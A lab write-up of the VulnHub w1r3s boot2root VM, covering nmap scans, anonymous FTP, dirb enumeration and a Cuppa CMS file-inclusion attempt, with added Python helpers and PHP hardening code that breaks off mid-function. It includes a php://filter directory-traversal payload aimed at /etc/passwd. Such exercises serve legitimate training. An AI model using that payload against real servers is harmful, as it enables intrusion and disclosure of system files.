Boot2root notes (1): VulnHub, w1r3s:1.0.1

Information gathering
Step one: use the ifconfig command to check which subnet the Kali VM is on.

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.132  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::20c:29ff:fe17:9209  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:17:92:09  txqueuelen 1000  (Ethernet)
        RX packets 75  bytes 7064 (6.8 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 46  bytes 5486 (5.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4  bytes 240 (240.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4  bytes 240 (240.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Next, before the target VM is powered on, run nmap host discovery: nmap -sn 192.168.1.000/24

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.1.000/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 11:06 CST
Nmap scan report for 192.168.1.2
Host is up (0.00026s latency).
Nmap scan report for 192.168.1.132
Host is up (0.00018s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.54 seconds

After the target is powered on, run host discovery once more.

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -sn 192.168.1.000/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 11:07 CST
Nmap scan report for 192.168.1.2
Host is up (0.00046s latency).
Nmap scan report for 192.168.1.132
Host is up (0.0011s latency).
Nmap scan report for 192.168.1.133
Host is up (0.00025s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 5.01 seconds

Comparing the two results, the target's IP address is 192.168.1.133.
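The before/after comparison above can be automated. The following is an added example, not code from the original write-up: it parses two `nmap -sn` outputs (constructed here in the same format the scans above print) and returns the hosts that appear only in the second run. The `ignore` parameter and the sample texts are this example's own assumptions.

```python
"""Find the target by diffing two `nmap -sn` host-discovery runs.

Added example, not part of the original write-up. The two scan outputs are
constructed here in the same format the write-up shows so the script runs
offline; in practice feed it the real output (or `nmap -sn -oG -` for a
stable, grepable format).
"""
import ipaddress
import re
from typing import Dict, Iterable, List

# Matches both "Nmap scan report for 192.168.1.2" and
# "Nmap scan report for host.example (192.168.1.2)".
HOST_RE = re.compile(
    r"^Nmap scan report for "
    r"(?:(?P<name>\S+) \((?P<ip_named>\d{1,3}(?:\.\d{1,3}){3})\)"
    r"|(?P<ip>\d{1,3}(?:\.\d{1,3}){3}))$"
)

# Constructed sample: host discovery before the target VM is powered on.
SCAN_BEFORE = """\
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 11:06 CST
Nmap scan report for 192.168.1.2
Host is up (0.00026s latency).
Nmap scan report for 192.168.1.132
Host is up (0.00018s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 4.54 seconds
"""

# Constructed sample: the same scan after the target VM is powered on.
SCAN_AFTER = """\
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 11:07 CST
Nmap scan report for 192.168.1.2
Host is up (0.00046s latency).
Nmap scan report for 192.168.1.132
Host is up (0.0011s latency).
Nmap scan report for 192.168.1.133
Host is up (0.00025s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 5.01 seconds
"""


def parse_live_hosts(nmap_sn_output: str) -> Dict[str, str]:
    """Return {ip: hostname-or-ip} for every host nmap reported as up."""
    hosts: Dict[str, str] = {}
    for line in nmap_sn_output.splitlines():
        m = HOST_RE.match(line.strip())
        if not m:
            continue
        ip = m.group("ip") or m.group("ip_named")
        hosts[ip] = m.group("name") or ip
    return hosts


def new_hosts(before: str, after: str, ignore: Iterable[str] = ()) -> List[str]:
    """IPs present in the second run but not the first, sorted numerically.

    `ignore` drops known addresses (your own VM, the hypervisor's gateway)
    so a busy lab network still yields a short candidate list.
    """
    seen_before = set(parse_live_hosts(before))
    seen_after = set(parse_live_hosts(after))
    candidates = (seen_after - seen_before) - set(ignore)
    return sorted(candidates, key=ipaddress.ip_address)


if __name__ == "__main__":
    # Caveat: an unprivileged `nmap -sn` only sends TCP probes to ports 80
    # and 443 (ICMP and ARP probes need root), so a host that filters those
    # can be missed; an empty diff is not proof the VM is absent.
    for ip in new_hosts(SCAN_BEFORE, SCAN_AFTER, ignore=["192.168.1.132"]):
        print("new host:", ip)
```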
Next, scan the target's ports.

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -min-rate=10000 -p- 192.168.1.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 11:10 CST
Nmap scan report for 192.168.1.133
Host is up (0.00015s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (conn-refused)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 14.30 seconds

Four ports turn out to have services listening; FTP, MySQL and SSH are the ones of most interest, so note them for later.
Next, scan these ports and the host in more depth: sudo nmap -sT -sV -O -p 21,22,80,3306 192.168.1.133. Note that this scan (because of -O) and UDP scans require root privileges.

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ sudo nmap -sT -sV -O -p 21,22,80,3306 192.168.1.133
[sudo] password for pixe1_p0ints: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-28 11:13 CST
Nmap scan report for 192.168.1.133
Host is up (0.00036s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:AA:7F:FC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.9 (97%), Linux 5.1 (95%), Linux 3.13 - 3.16 (93%), Linux 4.10 (93%), Linux 3.4 - 3.10 (93%), Linux 3.10 (93%), Linux 4.4 (92%), Synology DiskStation Manager 5.2-5644 (92%), Linux 3.16 - 4.6 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.94 seconds

Nothing especially valuable there, so I'll try a UDP scan: sudo nmap -sU -p21,22,80,3306 172.19.0.15

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ sudo nmap -sU -p21,22,80,3306 172.19.0.15       
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-29 19:09 CST
Nmap scan report for 172.19.0.15
Host is up (0.00019s latency).

PORT     STATE         SERVICE
21/udp   open|filtered ftp
22/udp   open|filtered ssh
80/udp   open|filtered http
3306/udp closed        mysql
MAC Address: 00:0C:29:AA:7F:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds

I switched machines at this point, so the addresses changed slightly.
The UDP results are not very informative either.
Beyond that, nmap also offers script scanning: nmap -script=vuln -p21,22,80,3306 172.19.0.15
vuln (vulnerability) is nmap's default vulnerability-scanning script category. Here is an introduction to nmap script usage compiled by someone else: https://zhuanlan.zhihu.com/p/441216448

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ nmap -script=vuln -p21,22,80,3306 172.19.0.15
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-29 19:20 CST
Nmap scan report for 172.19.0.15
Host is up (0.00033s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum: 
|_  /wordpress/wp-login.php: Wordpress login page.
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 321.62 seconds

The output says no XSS or CSRF vulnerabilities were found, but a (Slowloris) DoS attack looks possible. DoS is not elegant, though, so I'll set it aside.
The output also reveals a WordPress page; worth noting, since there may be an exploitable vulnerability there.
FTP exploitation
That more or less wraps up information gathering. Next, exploit what the collected information points to.
First, FTP. Anonymous login uses the username anonymous with an empty password; enter those and you are logged in directly.

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ ftp 172.19.0.15
Connected to 172.19.0.15.
220 Welcome to W1R3S.inc FTP service.
Name (172.19.0.15:pixe1_p0ints): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> 

Login successful; that was fairly smooth.

Change into the directory to list the files, and download them with the mget command.
Then inspect them one by one.
Here are two encoded strings that look suspicious, very much like MD5 and base64. To tell whether they really are, Kali has a tool that can give a rough identification.
The tool identifies the first as MD5, so let's take a first crack at it.
A decoy, useless information. Decode the base64 as well.
Unsurprisingly, that is a decoy too.
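The shape-based identification above (what hash-identifier style tools do) and the base64 decode, as an added example that is not code from the original write-up. The two sample strings, `SAMPLE_MD5` and `SAMPLE_B64`, are constructed here and stand in for the ones found on the share; `classify` and `lookup_md5` are this example's own functions.

```python
"""Heuristic identification of the two suspicious strings from the FTP share.

Added example, not part of the original write-up. It does what
hash-identifier style tools do (length and character-set checks), attempts a
strict base64 decode, and shows why such identification is only a guess.
The two sample strings are constructed here; they are not the target's.
"""
import base64
import binascii
import hashlib
import re
from typing import Dict, List, Optional

# Hex digests of the same length are indistinguishable by shape alone: a
# 32-hex-char string may be MD5, MD4 or an NTLM hash, which is why identifier
# tools report a ranked list of candidates rather than one answer.
HEX_DIGEST_CANDIDATES = {
    32: ["MD5", "MD4", "NTLM"],
    40: ["SHA-1", "RIPEMD-160"],
    64: ["SHA-256", "SHA3-256"],
    128: ["SHA-512", "Whirlpool"],
}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

# Constructed samples (not the target's): an unsalted MD5 of a weak password
# and a base64-wrapped decoy note.
SAMPLE_MD5 = hashlib.md5(b"password").hexdigest()
SAMPLE_B64 = base64.b64encode(b"Nothing to see here, keep looking.").decode()


def hex_digest_candidates(s: str) -> List[str]:
    """Algorithms whose hex digest has this length, if the string is hex."""
    if not HEX_RE.match(s):
        return []
    return HEX_DIGEST_CANDIDATES.get(len(s), [])


def decode_base64(s: str) -> Optional[bytes]:
    """Strict base64 decode; None if the string is not well-formed base64."""
    if not B64_RE.match(s) or len(s) % 4:
        return None
    try:
        return base64.b64decode(s, validate=True)
    except binascii.Error:
        return None


def classify(s: str) -> Dict[str, object]:
    """Shape-based guess: digest candidates plus any printable base64 text.

    A 32-char hex string is also syntactically valid base64, so the decode
    is attempted for every input and kept only when it yields printable
    ASCII; that filter is what turns a tool's guess into a usable one.
    """
    raw = decode_base64(s)
    text = None
    if raw is not None and all(0x20 <= b < 0x7F for b in raw):
        text = raw.decode("ascii")
    return {"hex_digest_candidates": hex_digest_candidates(s), "base64_text": text}


def lookup_md5(digest: str, wordlist: List[str]) -> Optional[str]:
    """Dictionary lookup of an unsalted MD5: the reason it is a weak choice."""
    digest = digest.lower()
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == digest:
            return word
    return None


if __name__ == "__main__":
    for s in (SAMPLE_MD5, SAMPLE_B64):
        print(s, "->", classify(s))
    print("md5 match:", lookup_md5(SAMPLE_MD5, ["letmein", "password", "admin"]))
```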
worktdo.txt reads as follows; it tells us FTP is not the right route to privilege escalation.
A dead end, but we haven't finished reading the files.
An employee list; roles like manager, HR and technician deserve attention.

Web penetration
FTP is done; next, look at port 80. Visiting it directly shows an Apache default page.
There may be other directories we don't know about, so brute-force them.

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ dirb http://172.19.0.15

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Dec 29 20:37:09 2023
URL_BASE: http://172.19.0.15/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://172.19.0.15/ ----
==> DIRECTORY: http://172.19.0.15/administrator/                                                                                                                                                                                                                                 
+ http://172.19.0.15/index.html (CODE:200|SIZE:11321)                                                                                                                                                                                                                            
==> DIRECTORY: http://172.19.0.15/javascript/                                                                                                                                                                                                                                    
+ http://172.19.0.15/server-status (CODE:403|SIZE:299)                                                                                                                                                                                                                           
==> DIRECTORY: http://172.19.0.15/wordpress/                                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/ ----
==> DIRECTORY: http://172.19.0.15/administrator/alerts/                                                                                                                                                                                                                          
==> DIRECTORY: http://172.19.0.15/administrator/api/                                                                                                                                                                                                                             
==> DIRECTORY: http://172.19.0.15/administrator/classes/                                                                                                                                                                                                                         
==> DIRECTORY: http://172.19.0.15/administrator/components/                                                                                                                                                                                                                      
==> DIRECTORY: http://172.19.0.15/administrator/extensions/                                                                                                                                                                                                                      
+ http://172.19.0.15/administrator/index.php (CODE:302|SIZE:6943)                                                                                                                                                                                                                
==> DIRECTORY: http://172.19.0.15/administrator/installation/                                                                                                                                                                                                                    
==> DIRECTORY: http://172.19.0.15/administrator/js/                                                                                                                                                                                                                              
==> DIRECTORY: http://172.19.0.15/administrator/language/                                                                                                                                                                                                                        
==> DIRECTORY: http://172.19.0.15/administrator/media/                                                                                                                                                                                                                           
+ http://172.19.0.15/administrator/robots.txt (CODE:200|SIZE:26)                                                                                                                                                                                                                 
==> DIRECTORY: http://172.19.0.15/administrator/templates/                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/javascript/ ----
==> DIRECTORY: http://172.19.0.15/javascript/jquery/                                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/wordpress/ ----
+ http://172.19.0.15/wordpress/index.php (CODE:200|SIZE:55843)                                                                                                                                                                                                                   
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/                                                                                                                                                                                                                            
==> DIRECTORY: http://172.19.0.15/wordpress/wp-content/                                                                                                                                                                                                                          
==> DIRECTORY: http://172.19.0.15/wordpress/wp-includes/                                                                                                                                                                                                                         
+ http://172.19.0.15/wordpress/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/alerts/ ----
+ http://172.19.0.15/administrator/alerts/index.html (CODE:200|SIZE:31)                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/api/ ----
==> DIRECTORY: http://172.19.0.15/administrator/api/administrator/                                                                                                                                                                                                               
+ http://172.19.0.15/administrator/api/index.php (CODE:200|SIZE:62)                                                                                                                                                                                                              
==> DIRECTORY: http://172.19.0.15/administrator/api/test/                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/classes/ ----
==> DIRECTORY: http://172.19.0.15/administrator/classes/ajax/                                                                                                                                                                                                                    
+ http://172.19.0.15/administrator/classes/index.html (CODE:200|SIZE:31)                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/components/ ----
==> DIRECTORY: http://172.19.0.15/administrator/components/configuration/                                                                                                                                                                                                        
+ http://172.19.0.15/administrator/components/index.html (CODE:200|SIZE:31)                                                                                                                                                                                                      
==> DIRECTORY: http://172.19.0.15/administrator/components/menu/                                                                                                                                                                                                                 
==> DIRECTORY: http://172.19.0.15/administrator/components/stats/                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/extensions/ ----
==> DIRECTORY: http://172.19.0.15/administrator/extensions/banners/                                                                                                                                                                                                              
==> DIRECTORY: http://172.19.0.15/administrator/extensions/content/                                                                                                                                                                                                              
+ http://172.19.0.15/administrator/extensions/index.html (CODE:200|SIZE:31)                                                                                                                                                                                                      
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/installation/ ----
==> DIRECTORY: http://172.19.0.15/administrator/installation/html/                                                                                                                                                                                                               
+ http://172.19.0.15/administrator/installation/index.php (CODE:200|SIZE:4322)                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/js/ ----
==> DIRECTORY: http://172.19.0.15/administrator/js/filemanager/                                                                                                                                                                                                                  
+ http://172.19.0.15/administrator/js/index.html (CODE:200|SIZE:31)                                                                                                                                                                                                              
==> DIRECTORY: http://172.19.0.15/administrator/js/jquery/                                                                                                                                                                                                                       
==> DIRECTORY: http://172.19.0.15/administrator/js/tiny_mce/                                                                                                                                                                                                                     
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/language/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/media/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/templates/ ----
==> DIRECTORY: http://172.19.0.15/administrator/templates/default/                                                                                                                                                                                                               
+ http://172.19.0.15/administrator/templates/index.html (CODE:200|SIZE:31)                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/javascript/jquery/ ----
+ http://172.19.0.15/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                                                                                                                                                                             
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/wordpress/wp-admin/ ----
+ http://172.19.0.15/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                                                                                                              
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/css/                                                                                                                                                                                                                        
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/images/                                                                                                                                                                                                                     
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/includes/                                                                                                                                                                                                                   
+ http://172.19.0.15/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                                                                                                              
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/js/                                                                                                                                                                                                                         
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/maint/                                                                                                                                                                                                                      
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/network/                                                                                                                                                                                                                    
==> DIRECTORY: http://172.19.0.15/wordpress/wp-admin/user/                                                                                                                                                                                                                       
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/wordpress/wp-content/ ----
+ http://172.19.0.15/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                                                                                                            
==> DIRECTORY: http://172.19.0.15/wordpress/wp-content/plugins/                                                                                                                                                                                                                  
==> DIRECTORY: http://172.19.0.15/wordpress/wp-content/themes/                                                                                                                                                                                                                   
==> DIRECTORY: http://172.19.0.15/wordpress/wp-content/upgrade/                                                                                                                                                                                                                  
==> DIRECTORY: http://172.19.0.15/wordpress/wp-content/uploads/                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/api/administrator/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                                                                 
---- Entering directory: http://172.19.0.15/administrator/api/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/classes/ajax/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/components/configuration/ ----
==> DIRECTORY: http://172.19.0.15/administrator/components/configuration/html/
+ http://172.19.0.15/administrator/components/configuration/index.php (CODE:200|SIZE:45)

---- Entering directory: http://172.19.0.15/administrator/components/menu/ ----
==> DIRECTORY: http://172.19.0.15/administrator/components/menu/classes/
==> DIRECTORY: http://172.19.0.15/administrator/components/menu/html/
+ http://172.19.0.15/administrator/components/menu/index.php (CODE:200|SIZE:45)

---- Entering directory: http://172.19.0.15/administrator/components/stats/ ----
+ http://172.19.0.15/administrator/components/stats/index.php (CODE:200|SIZE:45)

---- Entering directory: http://172.19.0.15/administrator/extensions/banners/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/extensions/content/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/installation/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/js/filemanager/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/js/jquery/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/js/tiny_mce/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/templates/default/ ----
==> DIRECTORY: http://172.19.0.15/administrator/templates/default/classes/
==> DIRECTORY: http://172.19.0.15/administrator/templates/default/css/
==> DIRECTORY: http://172.19.0.15/administrator/templates/default/html/
==> DIRECTORY: http://172.19.0.15/administrator/templates/default/images/
+ http://172.19.0.15/administrator/templates/default/index.php (CODE:500|SIZE:0)

---- Entering directory: http://172.19.0.15/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/wordpress/wp-admin/network/ ----
+ http://172.19.0.15/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ http://172.19.0.15/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)

---- Entering directory: http://172.19.0.15/wordpress/wp-admin/user/ ----
+ http://172.19.0.15/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ http://172.19.0.15/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)

---- Entering directory: http://172.19.0.15/wordpress/wp-content/plugins/ ----
+ http://172.19.0.15/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)

---- Entering directory: http://172.19.0.15/wordpress/wp-content/themes/ ----
+ http://172.19.0.15/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)

---- Entering directory: http://172.19.0.15/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/components/configuration/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/components/menu/classes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/components/menu/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/templates/default/classes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/templates/default/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/templates/default/html/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.19.0.15/administrator/templates/default/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Fri Dec 29 20:38:14 2023
DOWNLOADED: 106076 - FOUND: 28

We try visiting index.php, and it automatically redirects to /administrator/installation/
[screenshot]
Here we can see that the site's CMS is Cuppa, and that this is an installation page. Installation needs write permission, so a vulnerability is quite likely.
Click "Next" to enter the installation page.
[screenshot]
But installing means risk: you don't know whether this step will overwrite the server or be noticed by the operations staff.
Ignoring the risk, we install directly.
I forgot to take a screenshot here. The response told us the database was created successfully, but the administrator account was not, and there was no other information. We can only click back; clearly this path is a dead end.
Here we can use the searchsploit tool to search for vulnerabilities: searchsploit cuppa cms

┌──(pixe1_p0ints㉿kali)-[~/Desktop]
└─$ searchsploit cuppa cms
------------------------------------------- ---------------------------------
 Exploit Title                             |  Path
------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/ | php/webapps/25971.txt
------------------------------------------- ---------------------------------
Shellcodes: No Results

There is only one result; download it and take a look: searchsploit cuppa cms -m 25971.txt
[screenshot] It tells us there is a file inclusion vulnerability.

[screenshot]
The path does not exist, which means this path is wrong.
On the earlier installation page and in the paths dirb found, we saw that the site's directories all start with administrator, so we can reasonably suspect that the site root is the administrator directory. Let's try it.
[screenshot]
Access succeeds, so the path is right, but nothing comes back. 25971.txt mentions an encoding issue and uses a PHP stream wrapper (php://filter) to read the file contents, so we can imitate that.

http://172.19.0.15/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../../../../../../../../../etc/passwd

Still no content. The vulnerability should exist, and the page is reachable, so this is not an access problem; here we can look at the source. Cuppa CMS is an open-source content management system, and its source can be found on the Internet.
[screenshot] Found it; the vulnerability has not been fixed.

<?php include "../components/table_manager/fields/config/".@$cuppa->POST("urlConfig"); ?>

Found the cause: the parameter is read from POST here, while we sent it with GET, so naturally nothing was echoed back.
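As an added example (not Cuppa CMS's own code; $baseDir and the field-config file names are assumptions), here is the include pattern above beside a hardened version that pins the included file to the config directory and rejects traversal and stream wrappers:

```php
<?php
// Added example, not Cuppa CMS project code. It contrasts the include pattern
// shown in the write-up with a variant that keeps the included file inside one
// directory. $baseDir and the field-config file names are assumptions.

// Vulnerable pattern (as on the page): the POST value is concatenated straight
// into include, so "../../../etc/passwd" walks out of the config directory and
// "php://filter/..." is interpreted as a stream wrapper.
function vulnerable_include(string $urlConfig): void
{
    include "../components/table_manager/fields/config/" . $urlConfig;
}

// Hardened variant: accept only a plain "<name>.php" file that resolves to a
// real file inside $baseDir. Returns the resolved path, or null to reject.
function safe_config_path(string $baseDir, string $urlConfig): ?string
{
    // 1. Shape check: no slashes, backslashes, NUL bytes or "scheme://" prefix
    //    can pass this pattern. \z (not $) so a trailing newline is not allowed.
    if (!preg_match('/\A[A-Za-z0-9_-]+\.php\z/', $urlConfig)) {
        return null;
    }

    // 2. Containment check: resolve both sides and require the target to sit
    //    under the base directory. realpath() returns false for missing files.
    $base = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $urlConfig);
    if ($base === false || $target === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

function hardened_include(string $urlConfig): void
{
    $dir = __DIR__ . '/../components/table_manager/fields/config';
    $path = safe_config_path($dir, $urlConfig);
    if ($path === null) {
        http_response_code(400);
        exit('invalid configuration field');
    }
    include $path;
}

// Constructed self-check: a temporary config directory with one real file,
// then the kinds of input seen in this write-up are run through the filter.
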